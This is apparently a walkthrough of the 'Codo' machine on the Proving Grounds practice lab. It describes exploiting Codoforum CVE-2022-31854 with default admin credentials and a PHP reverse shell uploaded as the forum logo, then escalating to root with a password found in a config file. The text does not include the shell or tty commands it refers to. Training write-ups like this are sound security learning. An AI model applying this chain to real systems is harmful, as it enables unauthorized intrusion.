Codo
Last updated
Last updated
Source: Proving Grounds OS: Linux Community Rating: Easy
I started with the usual autorecon, which exposed:
SSH (22)
HTTP (80)
I began with HTTP (80). It displayed a Codoforum page. I played around for a while before checking for a CVE. I found CVE-2022-31854, which provided RCE but required valid credentials. I tried the default credentials (admin:admin) and they worked. I was in to the admin panel!
I attempted to run the PoC to get a shell back, but that didn't work, so I did it manually.
I created a PHP reverse shell and then opened the admin panel at: http://192.168.197.23/admin/
Logged in as admin, navigated to Global Settings, and went to "Upload logo for your forum" where I uploaded my PHP shell.
To execute it, I visited: http://192.168.197.23/sites/default/assets/img/attachments/shell.php
These steps were outlined in the CVE's PoC. I just followed them.
I checked my listener and, sure enough, I got a reverse shell.
I then converted it into a proper tty with the following commands:
I searched for a flag using
That found nothing. Then I remembered that the machine has only one flag. Time to escalate privileges and search again.
I uploaded linpeas, and it exposed a password in the PHP configuration file at: /var/www/html/sites/default/config.php
The password found was FatPanda123. I first tried it for the offsec user (since there was an offsec directory in the home directory), but it didn't work there. Then I checked it for root, and it worked. We were in as root, as simple as that.
Sometimes a web application's administrative interface can be an effective RCE vector if valid credentials are obtained also make sure to try default credentials.
When a PoC doesn't work. Following the steps provided in the CVE's PoC manually can make it work.
Configuration files often contain sensitive credentials.